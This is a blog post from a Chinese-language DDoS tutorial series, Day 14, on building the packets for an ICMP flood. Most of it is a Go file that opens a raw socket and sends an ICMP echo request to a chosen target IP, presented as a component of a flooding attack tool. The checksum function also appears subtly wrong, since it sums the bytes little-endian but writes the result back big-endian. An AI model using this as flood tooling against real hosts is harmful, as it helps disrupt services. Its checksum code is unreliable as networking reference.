iT邦幫忙

2023 iThome 鐵人賽
DAY 14
0
SideProject30

DDOS:閑的沒事就開始DDOS系列 第 14

[Day 14] 閑的沒事就寫封包 - ICMP Flood之建立封包

15th鐵人賽 icmp_flood
369 瀏覽

  • 分享至 

  • xImage
    •  

ICMP Flood

攻擊者大量發送icmp(Internet Control Message Protocol)回應請求封包使目標機器不刊負荷,導致正常流量無法進入目標機器。

sysIcmp.go

// @Title   sysIcmp.go
// @Description   Build an icmp packet with sys/unix
// @Author   Sunny Tsai
// @Update   2023-09-27
package packet

import (
	"log"
	"net"

	"golang.org/x/sys/unix"
)

// @title   Icmp
// @description   Build an icmp packet with sys/unix
// @auth     Sunny Tsai     Time(2023/09/27)
// @param    targetIP        string        send to target ip address
// @return   error           error
func Icmp(targetIP string) error {
	srcIP := "0.0.0.0"

	// build socket
	fd, err := unix.Socket(unix.AF_INET, unix.SOCK_RAW, unix.IPPROTO_ICMP)
	if err != nil {
		log.Fatal(err)
	}
	defer unix.Close(fd)

	localAddr := &unix.SockaddrInet4{}
	copy(localAddr.Addr[:], net.ParseIP(srcIP).To4())

	err = unix.Bind(fd, localAddr)
	if err != nil {
		log.Fatal(err)
	}

	// set message
	message := []byte("")

	remoteAddr := &unix.SockaddrInet4{}
	copy(remoteAddr.Addr[:], net.ParseIP(targetIP).To4())

	sendIcmpTo(fd, message, remoteAddr)

	return nil
}

// @title   sendIcmpTo
// @description   Send ICMP packet to target
// @auth     Sunny Tsai     Time(2023/09/27)
// @param    fd              int           socket fd
// @param    message         []byte        message
// @param    remoteAddr      *unix.SockaddrInet4    remote address
func sendIcmpTo(fd int, message []byte, remoteAddr *unix.SockaddrInet4) {

	icmpPacket := append([]byte{8, 0, 0, 0, 0, 0, 0, 0}, message...) // ICMP类型8表示Echo Request

	// 计算并设置校验和
	checksum := calculateChecksum(icmpPacket)
	icmpPacket[2] = byte(checksum >> 8)
	icmpPacket[3] = byte(checksum)

	_ = unix.Sendto(fd, icmpPacket, 0, remoteAddr)
}

// @title   calculateChecksum
// @description   Calculate the checksum for ICMP packet
// @auth     Sunny Tsai     Time(2023/09/27)
// @param    data            []byte        ICMP packet data
// @return   uint16          checksum value
func calculateChecksum(data []byte) uint16 {
	sum := uint32(0)

	// Sum all 16-bit words
	for i := 0; i < len(data)-1; i += 2 {
		sum += uint32(data[i+1])<<8 + uint32(data[i])
	}

	// Add carry if any
	if len(data)%2 != 0 {
		sum += uint32(data[len(data)-1]) << 8
	}

	// Fold sum to 16 bits
	for (sum >> 16) > 0 {
		sum = (sum & 0xFFFF) + (sum >> 16)
	}

	// Take one's complement
	checksum := ^uint16(sum)
	return checksum
}

上一篇
[Day 13] 閑的沒事就寫封包 - ACK Flood之建立封包
下一篇
[Day 15] 閑著沒事就寫寫code
系列文
DDOS:閑的沒事就開始DDOS31
  1. 27
    [Day 27] 閑的沒事 - 碎片攻擊(Fragmentation Attack)之理論
  2. 28
    [Day 28] 閑的沒事 - Fragmentation TCP
  3. 29
    [Day 29] 閑的沒事 - Fragmentation UDP
  4. 30
    [Day 30] 閑的沒事 - HTTP SESSION
  5. 31
    [Day 31] 閑的沒事 - HTTP SESSION GET REQUEST
完整目錄
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言
iThome鐵人賽
參賽組數
1047
團體組數
40
累計文章數
13196
最後報名日
9/15
iT+看影片追技術 看影片追技術 看更多
熱門tag 看更多
15th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 16th鐵人賽 11th鐵人賽 鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# windows server linux css react 資訊安全
熱門問題
熱門回答
熱門文章
IT邦幫忙